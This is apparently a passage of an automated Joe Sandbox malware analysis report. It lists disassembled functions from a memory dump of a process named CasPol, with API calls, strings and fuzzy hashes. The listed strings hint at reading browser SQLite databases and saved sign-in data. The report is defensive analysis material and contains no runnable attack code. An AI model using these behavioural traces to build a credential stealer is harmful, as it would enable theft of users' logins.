                                                                                                                                                                                  • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                                                                                    • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                                                                                    • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                                                  • String ID: sysdatetimepick32
                                                                                                                                                                                  • API String ID: 1028950076-4169760276
                                                                                                                                                                                  • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                                                  • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                                                                                                  • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                                                  • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                                                                                                  Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                                                                                                  • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                                                                                                  • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                                                                                                  • memset.MSVCRT ref: 0041BA3D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy$memset
                                                                                                                                                                                  • String ID: -journal$-wal
                                                                                                                                                                                  • API String ID: 438689982-2894717839
                                                                                                                                                                                  • Opcode ID: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                                                                                                                                                                  • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                                                                                                                                                                  • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                                                                                  Function 00405B83 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                                                                                                  • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                                                                                                  • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                                                                                                    • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                                                                                                    • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                                                                                                  • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                                                                                                  • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Item$Dialog$MessageSend
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3975816621-0
                                                                                                                                                                                  • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                  • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                  • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                                                                                                  Function 00444C89 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                                                                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                    • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                                                                                  • String ID: .save$http://$https://$log profile$signIn
                                                                                                                                                                                  • API String ID: 1214746602-2708368587
                                                                                                                                                                                  • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                                                                                  • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                                                                                  • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                                                                                                  Function 00405DD1 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2313361498-0
                                                                                                                                                                                  • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                                                                                                                                                  • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                                                                                                  • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                                                                                                                                                  • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                                                                                                  Function 00405F4E Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                                                                                                  • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                                                                                                  • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                                                                                                    • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                                                                                                  • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                                                                                                  • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                                                                                                  • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Window$ItemMessageRectSend$Client
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2047574939-0
                                                                                                                                                                                  • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                                                                  • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                                                                                                  Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                    • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                    • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                                    • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                                                                                                    • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                                                                                                    • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy$memset
                                                                                                                                                                                  • String ID: gj
                                                                                                                                                                                  • API String ID: 438689982-4203073231
                                                                                                                                                                                  • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                  • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                                                                                  • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                                                                                  Function 0040BDB0 Relevance: 10.7, APIs: 7, Instructions: 151COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404398
                                                                                                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043AC
                                                                                                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043BF
                                                                                                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043D3
                                                                                                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043E7
                                                                                                                                                                                  • wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                  • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                                  • memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                                  • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                                                                                  • wcschr.MSVCRT ref: 0040BF24
                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressProc$FreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 161710377-0
                                                                                                                                                                                  • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                                                  • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                                                                                                  Function 00430C36 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                  • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                                                                                                  • API String ID: 3510742995-2446657581
                                                                                                                                                                                  • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                                  • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                                                                                                                  • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                                  • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                                                                                                                  Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                                                                                                  • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                                                                                                  • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                                                                                                  • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                                                                                                  • memset.MSVCRT ref: 00405ABB
                                                                                                                                                                                  • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                                                                                                  • SetFocus.USER32(?), ref: 00405B76
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4281309102-0
                                                                                                                                                                                  • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                                                                                  • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                                                                                                  • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                                                                                  • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                                                                                                  Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _snwprintfwcscat
                                                                                                                                                                                  • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                  • API String ID: 384018552-4153097237
                                                                                                                                                                                  • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                                                                                  • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                                                                                                  • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                                                                                  • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                                                                                                  Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                                                  • String ID: 0$6
                                                                                                                                                                                  • API String ID: 2029023288-3849865405
                                                                                                                                                                                  • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                                                  • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                                                                                                  • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                                                  • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                                                                                                  Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                                                                                  • memset.MSVCRT ref: 00405455
                                                                                                                                                                                  • memset.MSVCRT ref: 0040546C
                                                                                                                                                                                  • memset.MSVCRT ref: 00405483
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$memcpy$ErrorLast
                                                                                                                                                                                  • String ID: 6$\
                                                                                                                                                                                  • API String ID: 404372293-1284684873
                                                                                                                                                                                  • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                                                  • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                                                                                                  • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                                                  • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                                                                                                  Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                                                                  • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                                                                  • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                                                                  • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                                                                  • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1331804452-0
                                                                                                                                                                                  • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                                  • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                                                                                  • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                                  • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                                                                                  Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                                                                  • <%s>, xrefs: 004100A6
                                                                                                                                                                                  • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$_snwprintf
                                                                                                                                                                                  • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                  • API String ID: 3473751417-2880344631
                                                                                                                                                                                  • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                                                  • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                                                  • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                                                                                  Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                                  • String ID: %2.2X
                                                                                                                                                                                  • API String ID: 2521778956-791839006
                                                                                                                                                                                  • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                                  • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                                                                  • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                                                                  Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _snwprintfwcscpy
                                                                                                                                                                                  • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                                                  • API String ID: 999028693-502967061
                                                                                                                                                                                  • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                                                  • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                                                                                  • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
